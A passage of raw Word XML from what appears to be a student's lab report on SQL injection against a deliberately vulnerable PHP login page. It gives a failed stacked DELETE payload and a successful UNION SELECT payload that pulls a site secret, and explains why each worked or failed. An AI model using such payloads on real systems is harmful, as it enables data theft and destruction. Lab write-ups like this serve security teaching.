    <w:p w14:paraId="4F45B88A" w14:textId="77777777" w:rsidR="00D82469" w:rsidRDefault="00D82469" w:rsidP="008663C3"/>
    <w:p w14:paraId="7579E1FB" w14:textId="2330540E" w:rsidR="00097EBE" w:rsidRDefault="00097EBE" w:rsidP="008663C3">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101558A8" w14:textId="55199C86" w:rsidR="00097EBE" w:rsidRDefault="009462D7" w:rsidP="008663C3">
      <w:r>
        <w:t>USERNAME: Admin’; DELETE FROM credential WHERE Name = ‘Ted’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52969D71" w14:textId="474CBAD1" w:rsidR="005D3F55" w:rsidRDefault="005D3F55" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">PASSWORD: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A7C841" w14:textId="1A36D142" w:rsidR="005D3F55" w:rsidRDefault="00B91C50" w:rsidP="00496183">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="005D3F55">
        <w:t>password is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC9D62" w14:textId="77777777" w:rsidR="00B91C50" w:rsidRDefault="00B91C50" w:rsidP="008663C3"/>
    <w:p w14:paraId="242FCA21" w14:textId="01E8EF1B" w:rsidR="00097EBE" w:rsidRDefault="00097EBE" w:rsidP="008663C3">
      <w:r>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60297FB3" w14:textId="46C00B36" w:rsidR="00C74A6C" w:rsidRDefault="00C74A6C" w:rsidP="00C74A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Error message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2846D" w14:textId="3F802051" w:rsidR="00097EBE" w:rsidRDefault="005C7F82" w:rsidP="008663C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB85CD6" wp14:editId="62E430E8">
            <wp:extent cx="5943600" cy="536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36575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31648EBB" w14:textId="4014C924" w:rsidR="00C74A6C" w:rsidRDefault="00C74A6C" w:rsidP="00C74A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GET request when submitting the form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2A6DA" w14:textId="787533BB" w:rsidR="005C7F82" w:rsidRDefault="005C7F82" w:rsidP="008663C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22B3F441" wp14:editId="67C6C57F">
            <wp:extent cx="5943600" cy="871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871220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E7BFA" w14:textId="0AD29FAF" w:rsidR="00C74A6C" w:rsidRDefault="00C74A6C" w:rsidP="00C74A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MySQL version</w:t>
      </w:r>
      <w:r w:rsidR="009D1C62">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FCC981" w14:textId="38E62CF2" w:rsidR="00C74A6C" w:rsidRDefault="00C74A6C" w:rsidP="00C74A6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179CF954" wp14:editId="5615AFC2">
            <wp:extent cx="5943600" cy="6407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40715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40185E5D" w14:textId="451DB0F6" w:rsidR="00C74A6C" w:rsidRDefault="009D1C62" w:rsidP="009D1C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use of $conn-&gt;query in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AA6E9" w14:textId="723B7612" w:rsidR="009D1C62" w:rsidRDefault="00911247" w:rsidP="009D1C62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B94AB18" wp14:editId="03EF6151">
            <wp:extent cx="5943600" cy="9486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948690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D8FBC" w14:textId="4E972311" w:rsidR="009D1C62" w:rsidRDefault="00CC694C" w:rsidP="009D1C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Documentation for the PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:t>function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F052B" w14:textId="5B9CF591" w:rsidR="009D1C62" w:rsidRDefault="009D1C62" w:rsidP="009D1C62">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632F1A93" wp14:editId="4A7F8F56">
            <wp:extent cx="5943600" cy="37960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96030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B2469" w14:textId="77777777" w:rsidR="00F80432" w:rsidRDefault="00F80432" w:rsidP="008663C3"/>
    <w:p w14:paraId="1FDE415F" w14:textId="1B1339BF" w:rsidR="00C72236" w:rsidRDefault="00C72236" w:rsidP="008663C3">
      <w:r>
        <w:t>Explanation for failure to append a new statement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C10B3" w14:textId="30916ABA" w:rsidR="009D1C62" w:rsidRDefault="00AC239C" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">The attack was not successful because </w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:t xml:space="preserve">this is a feature of PHPs mySQL extension trying to prevent SQL injection. The </w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:t xml:space="preserve"> function used in </w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:t xml:space="preserve"> can only send a unique query to the currently active database on the server</w:t>
      </w:r>
      <w:r w:rsidR="00DB2258">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB2258">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="003A6CA6">
        <w:t>ultiple queries are not supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8272D" w14:textId="14C3DFBD" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="396B08D6" w14:textId="5A3ED5E7" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="37A0E8CB" w14:textId="330F8079" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="74C07BCB" w14:textId="175A12C9" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="758F5C31" w14:textId="17D0C654" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="3F55482D" w14:textId="45BEC103" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="41FF61B0" w14:textId="7D536F5B" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="04E3EEC6" w14:textId="374BC705" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="711EE148" w14:textId="48B57886" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="558D2224" w14:textId="22639207" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3"/>
    <w:p w14:paraId="60E5CCF0" w14:textId="574BAF5F" w:rsidR="00355C14" w:rsidRDefault="00355C14" w:rsidP="008663C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356744B" w14:textId="1A384717" w:rsidR="00C72236" w:rsidRDefault="004F1286" w:rsidP="008663C3">
      <w:r>
        <w:t>It depends on what the statement “Launch SQL injection by exploiting the ‘Password’ field” means.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C0895" w14:textId="77777777" w:rsidR="00DA3669" w:rsidRDefault="00DA3669" w:rsidP="008663C3"/>
    <w:p w14:paraId="50BA5C31" w14:textId="05E6D32F" w:rsidR="00C67B48" w:rsidRDefault="004F1286" w:rsidP="008663C3">
      <w:r>
        <w:t>Meaning 1: Both Username and Password fields can accept arbitrary user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E4F52" w14:textId="3AA02B3F" w:rsidR="00C67B48" w:rsidRDefault="004F1286" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">Conclusion: </w:t>
      </w:r>
      <w:r w:rsidR="009A0DE2">
        <w:t xml:space="preserve">Success. </w:t>
      </w:r>
      <w:r w:rsidR="00C67B48">
        <w:t xml:space="preserve">We do not need to exploit the PASSWORD field </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C67B48">
        <w:t>in order for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C67B48">
        <w:t xml:space="preserve"> the attack to be successful. Because the PHP code in </w:t>
      </w:r>
      <w:r w:rsidR="00C67B48">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">unsafe_home.php </w:t>
      </w:r>
      <w:r w:rsidR="00C67B48">
        <w:t xml:space="preserve">only checks whether the id field and the username field are null, but it does not check if the password provided by the user matches the password stored in the database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE00E8" w14:textId="1DD59D86" w:rsidR="00DA3669" w:rsidRDefault="00DA3669" w:rsidP="008663C3"/>
    <w:p w14:paraId="2708DDF8" w14:textId="22E2847A" w:rsidR="00DA3669" w:rsidRDefault="00DA3669" w:rsidP="008663C3">
      <w:r>
        <w:t>Meaning 2: The Username field must be “Admin”. But the Password field can accept arbitrary user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700FDF5" w14:textId="0A4D4A90" w:rsidR="00DA3669" w:rsidRDefault="00DA3669" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">Conclusion: </w:t>
      </w:r>
      <w:r w:rsidR="009A0DE2">
        <w:t>Failure</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F0A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0017765A">
        <w:t xml:space="preserve">Since the Username field is fixed as “Admin”, </w:t>
      </w:r>
      <w:r w:rsidR="006151B7">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00032391">
        <w:t>would have</w:t>
      </w:r>
      <w:r w:rsidR="006151B7">
        <w:t xml:space="preserve"> to provide the correct password </w:t>
      </w:r>
      <w:r w:rsidR="00032391">
        <w:t>for the admin, which is impossible. There is possibility for injecting SQL command</w:t>
      </w:r>
      <w:r w:rsidR="00213B98">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00032391">
        <w:t xml:space="preserve"> at the Password field. </w:t>
      </w:r>
      <w:r w:rsidR="0017765A">
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F0A">
        <w:t xml:space="preserve"> instead of the plain</w:t>
      </w:r>
      <w:r w:rsidR="008F635E">
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F0A">
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r w:rsidR="008F635E">
        <w:t>, the hashed input password is used for checking the credential</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F0A">
        <w:t>. Any malicious SQL statement inject</w:t>
      </w:r>
      <w:r w:rsidR="00213B98">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000162BD">
        <w:t xml:space="preserve">in the Password field will be hashed and therefore won’t be a valid SQL statement anymore. </w:t>
      </w:r>
      <w:r w:rsidR="00AD4485">
        <w:t>Since the</w:t>
      </w:r>
      <w:r w:rsidR="000162BD">
        <w:t xml:space="preserve"> attacker does not know the hash function</w:t>
      </w:r>
      <w:r w:rsidR="001D7DAC">
        <w:t xml:space="preserve"> beforehand</w:t>
      </w:r>
      <w:r w:rsidR="00AD4485">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001D7DAC">
        <w:t>it is very difficult for him to do the reverse engineering and construct a valid SQL query</w:t>
      </w:r>
      <w:r w:rsidR="00DA00EC">
        <w:t xml:space="preserve"> after hashing</w:t>
      </w:r>
      <w:r w:rsidR="00AD4485">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1CE3B3" w14:textId="41BDC831" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="28B5CC61" w14:textId="616E7124" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="64F74BFD" w14:textId="3FA63A04" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="670C8477" w14:textId="6642C157" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="00F95AAD" w14:textId="7918546B" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="356B8835" w14:textId="79551784" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="507420FB" w14:textId="12222B1B" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="43DC7031" w14:textId="7AC8E947" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="08AA5510" w14:textId="098DFB7E" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="26F5B87D" w14:textId="2ABF77AB" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="0E5EA468" w14:textId="5FD5CF9E" w:rsidR="00353273" w:rsidRDefault="00353273" w:rsidP="008663C3"/>
    <w:p w14:paraId="288AD630" w14:textId="7147B797" w:rsidR="00353273" w:rsidRDefault="00353273" w:rsidP="008663C3"/>
    <w:p w14:paraId="675B18FC" w14:textId="2CDA6293" w:rsidR="00353273" w:rsidRDefault="00353273" w:rsidP="008663C3"/>
    <w:p w14:paraId="693FF24A" w14:textId="111AFF9F" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3"/>
    <w:p w14:paraId="684B3203" w14:textId="35B2D8F1" w:rsidR="005F036B" w:rsidRDefault="005F036B" w:rsidP="008663C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29395E4F" w14:textId="495F5453" w:rsidR="00F97646" w:rsidRDefault="007235DA" w:rsidP="008663C3">
      <w:r>
        <w:t>Yes. The attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932D8EE" w14:textId="424ACE82" w:rsidR="007235DA" w:rsidRDefault="007235DA" w:rsidP="007235DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact content typed into USERNAME and PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE13302" w14:textId="6751678D" w:rsidR="00F56ADC" w:rsidRDefault="009E48EC" w:rsidP="00F56ADC">
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:r w:rsidR="003B59FA">
        <w:t>Rupert’ UNION SELECT name, value, 0, 0, 0, 0, 0, 0, 0, 0, 0 FROM elgg_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B59FA">
        <w:t>csrf.elgg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B59FA">
        <w:t>_csrfdatalists WHERE name = ‘__site_secret__’ #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEA6BB" w14:textId="69B45D69" w:rsidR="009E48EC" w:rsidRDefault="009E48EC" w:rsidP="00F56ADC">
      <w:r>
        <w:t>PASSWORD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250DC48" w14:textId="6D9AC704" w:rsidR="009E48EC" w:rsidRDefault="009E48EC" w:rsidP="009E48EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The PASSWORD field is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D8C9A" w14:textId="1775AA0C" w:rsidR="007235DA" w:rsidRDefault="007235DA" w:rsidP="007235DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The output of the successful attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18094DAD" w14:textId="76D85280" w:rsidR="00BC6F53" w:rsidRDefault="002177FD" w:rsidP="002177FD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71EA1ED4" wp14:editId="0372CCE3">
            <wp:extent cx="4996281" cy="335167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5342" cy="3357751"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA16387" w14:textId="02530E5B" w:rsidR="007235DA" w:rsidRDefault="007235DA" w:rsidP="007235DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD5A3F" w14:textId="15C67245" w:rsidR="005F036B" w:rsidRDefault="002177FD" w:rsidP="008663C3">
      <w:r>
        <w:t>The content of the site secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB4561" w14:textId="182DF6D7" w:rsidR="002177FD" w:rsidRDefault="00FA6C99" w:rsidP="00FA6C99">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4CDCB5" wp14:editId="618619B3">
            <wp:extent cx="5943600" cy="11163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8A71146" w14:textId="234DF83E" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="01392583" w14:textId="0860D4E8" w:rsidR="00A04A33" w:rsidRDefault="00A04A33" w:rsidP="008663C3"/>
    <w:p w14:paraId="05D4723F" w14:textId="77777777" w:rsidR="00A04A33" w:rsidRDefault="00A04A33" w:rsidP="008663C3"/>
    <w:p w14:paraId="1E05E061" w14:textId="2CAA5289" w:rsidR="00A2586D" w:rsidRDefault="00A2586D" w:rsidP="008663C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D0B2B" w14:textId="12F58E45" w:rsidR="00501643" w:rsidRDefault="00A04A33" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">In the attack, </w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ma</w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use of the UNION keyword. First, </w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provide</w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a non-existing username called “Rupert” </w:t>
      </w:r>
      <w:r w:rsidR="00455A4D">
        <w:t xml:space="preserve">so that the result of the SQL statement before UNION will be empty. Then, after the UNION, </w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00455A4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00993C91">
        <w:t>construct</w:t>
      </w:r>
      <w:r w:rsidR="007032B4">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00993C91">
        <w:t xml:space="preserve"> another SELECT statement that queries the site secret from csrflabelgg.com. </w:t>
      </w:r>
      <w:r w:rsidR="00B02E9B">
        <w:t>Assume that</w:t>
      </w:r>
      <w:r w:rsidR="001E2A73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B02E9B">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="001E2A73">
        <w:t xml:space="preserve"> know the following information: 1. The database name “elgg_csrf”. 2. The table name “elgg_csrfdatalists”. 3. The schema </w:t>
      </w:r>
      <w:r w:rsidR="00A02F51">
        <w:t xml:space="preserve">(column names) </w:t>
      </w:r>
      <w:r w:rsidR="001E2A73">
        <w:t xml:space="preserve">of the table “elgg_csrfdatalists”. </w:t>
      </w:r>
      <w:r w:rsidR="00E45B76">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="001E2A73">
        <w:t xml:space="preserve"> construct</w:t>
      </w:r>
      <w:r w:rsidR="00A02F51">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="001E2A73">
        <w:t xml:space="preserve"> the SELECT statement by providing the two column names “name” and “value” in the table “elgg_csrfdatalists” and then pad with 9 zeros to match the number of columns in the table “credential”</w:t>
      </w:r>
      <w:r w:rsidR="00D878E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D878E0">
        <w:t>in order for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D878E0">
        <w:t xml:space="preserve"> the UNION statement to be </w:t>
      </w:r>
      <w:r w:rsidR="00691FEC">
        <w:t>valid</w:t>
      </w:r>
      <w:r w:rsidR="008A64AF">
        <w:t xml:space="preserve">. Then </w:t>
      </w:r>
      <w:r w:rsidR="00C62DF2">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="008A64AF">
        <w:t xml:space="preserve"> speci</w:t>
      </w:r>
      <w:r w:rsidR="00C62DF2">
        <w:t>fied</w:t>
      </w:r>
      <w:r w:rsidR="008A64AF">
        <w:t xml:space="preserve"> the table name and filter</w:t>
      </w:r>
      <w:r w:rsidR="00922FF8">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="008A64AF">
        <w:t xml:space="preserve"> the rows such that name = “__site_secret__”.</w:t>
      </w:r>
      <w:r w:rsidR="00EE2070">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00871E97">
        <w:t>Then</w:t>
      </w:r>
      <w:r w:rsidR="00EE2070">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00922FF8">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00EE2070">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="00922FF8">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00EE2070">
        <w:t xml:space="preserve"> a hash symbol to comment out the rest SQL logic.</w:t>
      </w:r>
      <w:r w:rsidR="00871E97">
        <w:t xml:space="preserve"> Finally, I obtained the value of the “__site_secret__”. After comparing it with the true value, I concluded that my attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B6DAB" w14:textId="5BBAE840" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="2C6CC2C2" w14:textId="63784858" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="187C36D5" w14:textId="70503B34" w:rsidR="0096190D" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="50FC3213" w14:textId="77777777" w:rsidR="0096190D" w:rsidRPr="00570810" w:rsidRDefault="0096190D" w:rsidP="008663C3"/>
    <w:p w14:paraId="04771586" w14:textId="77777777" w:rsidR="00BB66F5" w:rsidRPr="00424612" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="33C01E7C" w14:textId="6C5E3F28" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A9BFA3" w14:textId="6929D5CF" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FC614F" w14:textId="612DD7E2" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BFDE2E" w14:textId="79BB65D2" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
